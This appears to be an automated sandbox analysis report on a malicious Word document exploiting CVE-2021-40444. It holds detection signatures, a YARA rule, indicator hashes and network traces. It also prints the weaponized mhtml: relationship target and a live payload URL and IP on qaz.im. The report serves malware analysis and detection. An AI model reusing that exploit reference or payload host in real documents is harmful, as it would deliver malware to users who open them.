Windows Analysis Report
nnxPt0Yydv.doc

Overview

General Information

Sample Name: nnxPt0Yydv.doc
Analysis ID: 696518
MD5: 15b691f0c5d627e71fed8a5d34fb0328
SHA1: 1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256: 3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
Tags: CVE-2022-30190, doc, Follina
Infos:

Detection

CVE-2021-40444
Score: 68
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Detected CVE-2021-40444 exploit
Contains an external reference to another file
Yara signature match
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Uses insecure TLS / SSL version for HTTPS connection

Classification

  • System is w7x64
  • WINWORD.EXE (PID: 2476 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
  • cleanup
No configs have been found
Yara signature match:
Source: document.xml.rels
Rule: EXPL_CVE_2021_40444_Document_Rels_XML
Description: Detects indicators found in weaponized documents that exploit CVE-2021-40444
Author: Jeremy Brown / @alteredbytes
Strings:
  • 0x3f8:$b1: /relationships/oleObject
  • 0x412:$c1: Target="mhtml:http
  • 0x45f:$c2: !x-usc:http
  • 0x4a7:$c3: TargetMode="External"
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: nnxPt0Yydv.doc | Avira: detected
Source: nnxPt0Yydv.doc | ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc | Virustotal: Detection: 48%

Exploits

Source: document.xml.rels | Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6
Source: unknown | HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown | HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: unknown | HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global trafficTCP traffic: 192.168.2.22:49192 -> 82.202.173.45:443
Source: global trafficTCP traffic: 82.202.173.45:443 -> 192.168.2.22:49192
Source: global traffic DNS query: name: qaz.im
Source: global traffic HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; ms-office; MSOffice 14)
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: global traffic HTTP traffic detected: GET /load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 HTTP/1.1
Accept: */*
UA-CPU: AMD64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: qaz.im
Connection: Keep-Alive
Cookie: PHPSESSID=mdbvi74n6qrlvvumg9fr8g1sn4
Source: Joe Sandbox View ASN Name: THEFIRST-ASRU THEFIRST-ASRU
Source: Joe Sandbox View JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: Joe Sandbox View JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: unknown HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49172 version: TLS 1.0
Source: unknown HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49173 version: TLS 1.0
Source: unknown HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49175 version: TLS 1.0
Source: unknown HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49184 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{636165D4-957F-4FF6-8584-BFA7FFC416EB}.tmp
Source: unknown DNS traffic detected: queries for: qaz.im
Source: unknown HTTPS traffic detected: 82.202.173.45:443 -> 192.168.2.22:49171 version: TLS 1.2
Source: document.xml.rels, type: SAMPLE Matched rule: EXPL_CVE_2021_40444_Document_Rels_XML date = 2021-09-10, author = Jeremy Brown / @alteredbytes, description = Detects indicators found in weaponized documents that exploit CVE-2021-40444, reference = https://twitter.com/AlteredBytes/status/1435811407249952772
Source: nnxPt0Yydv.doc ReversingLabs: Detection: 50%
Source: nnxPt0Yydv.doc Virustotal: Detection: 48%
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: nnxPt0Yydv.LNK.0.dr LNK file: ..\..\..\..\..\Desktop\nnxPt0Yydv.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\Desktop\~$xPt0Yydv.doc
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File created: C:\Users\user\AppData\Local\Temp\CVR7020.tmp
Source: classification engine Classification label: mal68.expl.evad.winDOC@1/17@9/1
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini
Source: Window Recorder Window detected: More than 3 window changes detected
Source: nnxPt0Yydv.doc Initial sample: OLE zip file path = word/media/image1.jpg
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Persistence and Installation Behavior

Source: document.xml.rels Extracted files from sample: mhtml:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6!x-usc:https://qaz.im/load/diy5ah/b6d42680-56fd-4f98-ae0e-ff81e3799df6
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | 13 Exploitation for Client Execution | Path Interception | Path Interception | 1 Masquerading | OS Credential Dumping | 1 File and Directory Discovery | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | 1 Encrypted Channel | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Rootkit | LSASS Memory | 2 System Information Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | 2 Non-Application Layer Protocol | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | 13 Application Layer Protocol | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | 2 Ingress Tool Transfer | SIM Card Swap | | Carrier Billing Fraud
Source | Detection | Scanner | Label
nnxPt0Yydv.doc | 50% | ReversingLabs | Document-Office.Exploit.CVE-2021-40444
nnxPt0Yydv.doc | 48% | Virustotal |
nnxPt0Yydv.doc | 100% | Avira | EXP/CVE-2021-40444.Gen
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label
qaz.im | 2% | Virustotal |
Source | Detection | Scanner | Label
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 | 0% | Avira URL Cloud | safe
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 | 3% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
qaz.im | 82.202.173.45 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://qaz.im/load/diy5AH/b6d42680-56fd-4f98-ae0e-ff81e3799df6 | false | 3%, Virustotal; Avira URL Cloud: safe | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
82.202.173.45 | qaz.im | Russian Federation | 29182 | THEFIRST-ASRU | true
Joe Sandbox Version:35.0.0 Citrine
Analysis ID:696518
Start date and time:2022-09-02 13:23:11 +02:00
Joe Sandbox Product:CloudBasic
Overall analysis duration:0h 4m 53s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:nnxPt0Yydv.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
Number of analysed new started processes analysed:4
Number of new started drivers analysed:1
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies:
  • HCA enabled
  • EGA enabled
  • HDC enabled
  • AMSI enabled
Analysis Mode:default
Analysis stop reason:Timeout
Detection:MAL
Classification:mal68.expl.evad.winDOC@1/17@9/1
EGA Information:Failed
HDC Information:Failed
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Adjust boot time
  • Enable AMSI
  • Found Word or Excel or PowerPoint or XPS Viewer
  • Attach to Office via COM
  • Scroll down
  • Close Viewer
  • Exclude process from analysis (whitelisted): mrxdav.sys, dllhost.exe
  • Report size getting too big, too many NtQueryAttributesFile calls found.
No simulations
No context
Match | Associated Sample Name / URL | Detection | Context
qaz.im | new_fax_document_1426.doc | malicious | 92.63.97.69
No context
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.28879490407012426
Encrypted:false
SSDEEP:48:I3ZrsRB68BT/wV0yYRzCmrWIdIP+ltUQ+VrXJkVIPpIPOH:K+LLoOd/xU5kOH
MD5:30075DA75A69E03B91CDC295A738FE71
SHA1:5C8EB1D3F7DC5B502212314F6405B25C9766603C
SHA-256:29A90C402102B1E2616519F5DE7AA09426AAAB3559494E5EBFDA3DA1DC16A660
SHA-512:172699B6B75DA2A3074DCBE0C418C34D00F964C84BF758940DEF4A4718394AFF0AED477B184D25C1A9280522E7ABBCC6083143CBA88500A40B7C2A67A7B6F363
Malicious:false
Reputation:low
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.6734044956719611
Encrypted:false
SSDEEP:96:KOCyQlWIZP3wHLRN7Xrka3oGX16Ilkl2IYP9gzS6WtPWtuWtUgt:ZzuoLyGXPwQlgzUib5
MD5:848796E37A8642B8F3B45C6176D8E814
SHA1:2D1D922A49C8B09E7B9FB8E0FDFE9A642E65B624
SHA-256:92BB7EFDF1993B4DD43843D0595C911F5AE646CEC4047CEEC557E6B6E9C641DC
SHA-512:15AA1AEF8EB965E8051358F3B98E7BE4EB0F7AE9D59783DA64F5DAFB8DB8461DDE5594B5B3842415DF26BCA06CF30EC2A4079A8DA68399B6C367F9D05C841DB9
Malicious:false
Reputation:low
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):114
Entropy (8bit):3.9508758081628756
Encrypted:false
SSDEEP:3:yVlgsRlztlZlULTINDtgI+F/YRogQ8lSR56aw27276:yPblzJyL8ZWI++qV8lSSBg22
MD5:99A54F4CFBDA747E27CF539D4A1807FF
SHA1:5EFB6E4012D07C7820C1022141A6B658AEC2CDB1
SHA-256:98FB7578F8FE1FAFDBE7B2AFD3B37E39161F2C3622433387CCF7AE6E178CC83E
SHA-512:0883837836C43A8201145CC9799409478863B1BF30ADE6E5A329B542EEC598427E4E31F3973F819D2B56723FEA6C7EA3B0DA0712EF56DF982BAAC1801AFA524E
Malicious:false
Reputation:low
Preview:..H..@....b..q....]F.S.D.-.{.0.C.E.D.F.B.9.A.-.6.7.2.A.-.4.9.5.E.-.A.8.C.3.-.4.E.2.E.5.C.C.4.F.E.A.5.}...F.S.D..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.28847987121721
Encrypted:false
SSDEEP:48:I39yCRBk2B05avmHBRbgEo8vTvPO4JyP6LaRrCDr7evivDH:K9yCL6Hwlm7VUPgWCbsQDH
MD5:E5AF351D93FC6BA388AB48ABD23907E0
SHA1:5D4145B35593C774D5F88A1997109E79496E3821
SHA-256:D42FB125C2C4BAE8CE74C54BD189F356B596582D3EA1CB96AB1532A586FAAA9B
SHA-512:D87BFEC3E1B73D65BC6D187CF4C6E69C1232A5F8CB203857CBD7FC6E577985E00DAA3C7696A6E50F57D124C0FDF8A10CAEFD4448D45C19EFCC21F82377F2F61D
Malicious:false
Reputation:low
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.22169434281918624
Encrypted:false
SSDEEP:24:I3mLwnM0B34BGDcSDzqSZ/yLfLSOeSg8YGILLK5zvfEKwJwz1w3m8Md505fZmjS/:I3mUrBzMjPZ2nhIgf5xT
MD5:70560F4917331B2A17868068A1E9517E
SHA1:359ADBCC510241A6528A866A1EA3B361D6EF93AF
SHA-256:475591FE9EC37DCD8BDBDE7E426317FD418DFEABEE6CD0DD0477A2D01834D97E
SHA-512:F1250F280EB632638962459F43C5EF4DFE5A7FFDDE2284A434878B854FD58DB69F617C4AF0ACA5CA143AD5EDD2AB6307CBDD1E139E479971ED5997FFD5E4ECB9
Malicious:false
Reputation:low
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):114
Entropy (8bit):4.003507387110244
Encrypted:false
SSDEEP:3:yVlgsRlzISUW2SblLyVSclQlpgkLVgdUal276:yPblzZRLBOwNgkyUu22
MD5:46245F9209D2C7C555186D14DDE809A1
SHA1:295F3AA146AF9E9C14506927280087F0919DD24E
SHA-256:21E9FB94661FAD6FB122E822A41EB27A2FDC31C0A526085D1A0BE3F732630FB9
SHA-512:918A990D8D30F9E3C37AB205EDC49E0967CD49BE5B377F99D8B219E89C0EB71F549295A603A31C2A576CC95AA023B21BDC3BBBDE00CAF6923B0BFF47020C463F
Malicious:false
Reputation:low
Preview:..H..@....b..q....]F.S.D.-.{.5.B.8.C.9.7.A.2.-.8.D.5.D.-.4.6.9.0.-.A.2.3.7.-.D.6.E.0.C.4.6.F.C.6.0.1.}...F.S.D..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:modified
Size (bytes):19364
Entropy (8bit):6.048046902595105
Encrypted:false
SSDEEP:384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW
MD5:C389F7EE1D9E6376B7D96E80D7A1FFE1
SHA1:2D0B931CF7CECDDDDB35457A5719353840F8CA66
SHA-256:8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
SHA-512:7DE15CF2ED560A6FF7E7FD5D3C8B0E4F13CA585BAB09D40E89785FC12F5B4C79D9F4CEC4034B3F40F4CA54ABAB100E27947867558DBC7876366A8B614EEA0FFC
Malicious:false
Reputation:low
Preview:<!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
Category:dropped
Size (bytes):19364
Entropy (8bit):6.048046902595105
Encrypted:false
SSDEEP:384:hZJbWuYvXebbmk2RFGqL1vXipiIPq2L15j+h5i4rXgrE/M1eEScjy:hZJCXAbmDRFJ16pti2Lvaxb2rlW
MD5:C389F7EE1D9E6376B7D96E80D7A1FFE1
SHA1:2D0B931CF7CECDDDDB35457A5719353840F8CA66
SHA-256:8A01945C5951B6685768C155D938E7805B097477FCBB7E815FCB1CC26F1170DA
SHA-512:7DE15CF2ED560A6FF7E7FD5D3C8B0E4F13CA585BAB09D40E89785FC12F5B4C79D9F4CEC4034B3F40F4CA54ABAB100E27947867558DBC7876366A8B614EEA0FFC
Malicious:false
Reputation:low
Preview:<!docTYpe HTML>....<hTml>....<bODy>....<sCriPT LanGuagE="jSCript">....
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 600x600, frames 3
Category:dropped
Size (bytes):22248
Entropy (8bit):7.567520825394468
Encrypted:false
SSDEEP:384:ma1KN3h8oGT1TS/TZs/r4VB5LuCBLAyB4KGO4v:7Zo21TSVur4z5Luy/BSF
MD5:66EBF5C50A28236AD77C5A306A4543E1
SHA1:F6EAA2DF964C95A2EB044AA94F5A691C1752E4B8
SHA-256:E80BFCC0066D4DFCE09EE172F5082C14D8EED957E8BF14B60FFC57C2F0BB1BDB
SHA-512:D79CD58FF50AA0725C334CCA8151B96AF1BA87E0D15034528055ED96D1B6686727B6A03C23BD069154B19BDC0E7F275A016A0F181C201F449A37AAD6D5568F0D
Malicious:false
Reputation:low
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.025565480559654664
Encrypted:false
SSDEEP:6:I3DPcHPeAzRvxggLRjJ5zRXv//4tfnRujlw//+GtluJ/eRuj:I3DPylRXJ5FvYg3J/
MD5:DAA1E7900566342CE799FAC7815E1AFA
SHA1:27E2175C96A6DA395860F5B87CCA811689FA8DDC
SHA-256:986189E409F4D446FDBC10306068115FB41CC06EFF771F10277DFAA969AEE504
SHA-512:C18AE54E036937187ACEC39CFCF044F1D3FF96B1F420430C0BDF529D82CE0C465EF64B1701D332C8289291B9D3626F3391CA4C47D736F49B5D4571D28E257B26
Malicious:false
Reputation:low
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):131072
Entropy (8bit):0.025538895507565103
Encrypted:false
SSDEEP:6:I3DPctQUuy8RvxggLRXWvqq3RXv//4tfnRujlw//+GtluJ/eRuj:I3DP8Q/LWDvYg3J/
MD5:7B2A21167EF7DE65851D941C40B49C48
SHA1:3E31789057B2852AD41409CF2D5616E30A6A842B
SHA-256:414B8D143DD15A3996171CB9AB5BD4EFC45F7915F7A65AF25441FBCE891B7CE2
SHA-512:F042E28D1964CE4ED593886985AB4653F13784750540FAE3C07541EA1AF87DF0B4668906B1CABECC607620C597928B2F7AC0A47ACDDDDA7C7F3A7DF4F20A5F65
Malicious:false
Reputation:low
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):71
Entropy (8bit):4.683364951357434
Encrypted:false
SSDEEP:3:bDuMJlTUmYmX1V1QmYv:bCYUm91QmC
MD5:82ED92CE73F3F2C3BF91D4C76D3A4760
SHA1:CEFFA2857F6D2C211B5C08CEC9957C3EAF09289A
SHA-256:83E793DEA3EBA35BCC76F8F6511BA90804AC6C71EA4B6A13AA5EA52C94C800FD
SHA-512:17CAACAE5AF04A439529B6AE67BDAD4413CC60C2704748512D80B1485103863C917F158AB4673BCE9715EDB0FF206FDD3438B43E3C1EC92201009830290179C5
Malicious:false
Preview:[folders]..Templates.LNK=0..nnxPt0Yydv.LNK=0..[doc]..nnxPt0Yydv.LNK=0..
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Mar 8 15:45:57 2022, mtime=Tue Mar 8 15:45:57 2022, atime=Fri Sep 2 19:23:18 2022, length=23549, window=hide
Category:dropped
Size (bytes):1014
Entropy (8bit):4.583562059208682
Encrypted:false
SSDEEP:12:8s46FgXg/XAlCPCHaXMBzB/nPyX+WeOcfY5i+icvbIszaHDtZ3YilMMEpxRljK34:8e/XT89dqcZdeMszqDv3qcTu7D
MD5:B33A705BC9650B7E27987D428B6A003A
SHA1:E56964067C53E7D6D18A4378B44EB33409244099
SHA-256:F655020F81323BF78D21B11053DFD2C4B4F8C3673710F1854603736BDFC5ED7C
SHA-512:12704B16A4214246CA1F265BC993824B97624814443A205A999B35DB03B85AEFD8478BD2DA1EEEE8482BD86BA00AF51BB863B70D7FE9C65EC7A7602DAC99633D
Malicious:false
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
File Type:data
Category:dropped
Size (bytes):162
Entropy (8bit):2.503835550707525
Encrypted:false
SSDEEP:3:vrJlaCkWtVyHH/cgQfmW+eMdln:vdsCkWtUb+8ll
MD5:D9C8F93ADB8834E5883B5A8AAAC0D8D9
SHA1:23684CCAA587C442181A92E722E15A685B2407B1
SHA-256:116394FEAB201D23FD7A4D7F6B10669A4CBCE69AF3575D9C1E13E735D512FA11
SHA-512:7742E1AC50ACB3B794905CFAE973FDBF16560A7B580B5CD6F27FEFE1CB3EF4AEC2538963535493DCC25F8F114E8708050EDF5F7D3D146DF47DA4B958F0526515
Malicious:false
Preview:.user..................................................A.l.b.u.s.............p........15..............25.............@35..............35.....z.......p45.....x...
File type:Microsoft Word 2007+
Entropy (8bit):7.956139045669752
TrID:
  • Word Microsoft Office Open XML Format document (49504/1) 49.01%
  • Word Microsoft Office Open XML Format document (43504/1) 43.07%
  • ZIP compressed archive (8000/1) 7.92%
File name:nnxPt0Yydv.doc
File size:23549
MD5:15b691f0c5d627e71fed8a5d34fb0328
SHA1:1c7cb38d8fc2f01a6331ade0fdf4cb9779a5ae74
SHA256:3833142e8b5a9174615c83c1165fa67bd9f46a230058adf8fc9cbb081bb92d30
SHA512:7e36de7c74b0b17d6a183125855da06a76c42e33506a76bc9450345d41267def85c0af982731a9d02c63ec80b7d8b425494ecde8cc2eb620012504801bdffb5d
SSDEEP:384:6wbSPfEjTkNesdDL667HzVutGCWyDVwZekDN81WqiJo9RxvrvmWqNWNX/wv3eSNU:9AEXkNegL6eHEnTwZvZ81Wqi+vrvUoXr
TLSH:3FB2D090C9B5045EE381E572D0887ACEF339F023C9A1A45C7332C5892BD759356A3A3B
File Content Preview:PK........4.!U...p`...T.......[Content_Types].xmlUT......c...c...c.T.N.0..#....U...B.i.,G.D......o.....7%B(4.m/..y.X..O.Zek.AZS.Q1$..n.4uI......BdF0e..d..L'.W...A..mBI.1.{J._.f....V*.5.x.5u......pxK.5.L.c. ..#Tl.b....&...H....WI.sJr..N.F.r....2.......@h.C
Icon Hash:e4eea2aaa4b4b4a4
Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 2, 2022 13:24:29.487700939 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:29.487759113 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.489001036 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.549762964 CEST49191443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:29.549812078 CEST4434919182.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.106692076 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.106761932 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.106980085 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.107181072 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.107209921 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.235860109 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.236004114 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.242399931 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.242423058 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.245078087 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.245094061 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.477787971 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.477845907 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.477931976 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.478002071 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.478028059 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.478044033 CEST4434919282.202.173.45192.168.2.22
Sep 2, 2022 13:24:58.478063107 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.478176117 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.480907917 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.501635075 CEST49192443192.168.2.2282.202.173.45
Sep 2, 2022 13:24:58.501671076 CEST4434919282.202.173.45192.168.2.22
TimestampSource PortDest PortSource IPDest IP
Sep 2, 2022 13:24:11.853436947 CEST5586853192.168.2.228.8.8.8
Sep 2, 2022 13:24:11.871222019 CEST53558688.8.8.8192.168.2.22
Sep 2, 2022 13:24:18.633838892 CEST4968853192.168.2.228.8.8.8
Sep 2, 2022 13:24:18.653536081 CEST53496888.8.8.8192.168.2.22
Sep 2, 2022 13:24:18.659006119 CEST5883653192.168.2.228.8.8.8
Sep 2, 2022 13:24:18.722076893 CEST53588368.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.043364048 CEST5013453192.168.2.228.8.8.8
Sep 2, 2022 13:24:22.110351086 CEST53501348.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.122073889 CEST5527553192.168.2.228.8.8.8
Sep 2, 2022 13:24:22.185585976 CEST53552758.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.896694899 CEST5991553192.168.2.228.8.8.8
Sep 2, 2022 13:24:22.916980028 CEST53599158.8.8.8192.168.2.22
Sep 2, 2022 13:24:22.924175978 CEST5440853192.168.2.228.8.8.8
Sep 2, 2022 13:24:23.003745079 CEST53544088.8.8.8192.168.2.22
Sep 2, 2022 13:24:26.515650988 CEST5010853192.168.2.228.8.8.8
Sep 2, 2022 13:24:26.535551071 CEST53501088.8.8.8192.168.2.22
Sep 2, 2022 13:24:26.538368940 CEST5472353192.168.2.228.8.8.8
Sep 2, 2022 13:24:26.556077957 CEST53547238.8.8.8192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 2, 2022 13:24:11.853436947 CEST | 192.168.2.22 | 8.8.8.8 | 0xfbc4 | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
Sep 2, 2022 13:24:18.633838892 CEST | 192.168.2.22 | 8.8.8.8 | 0xd915 | Standard query (0) | qaz.im | A (IP address) | IN (0x0001)
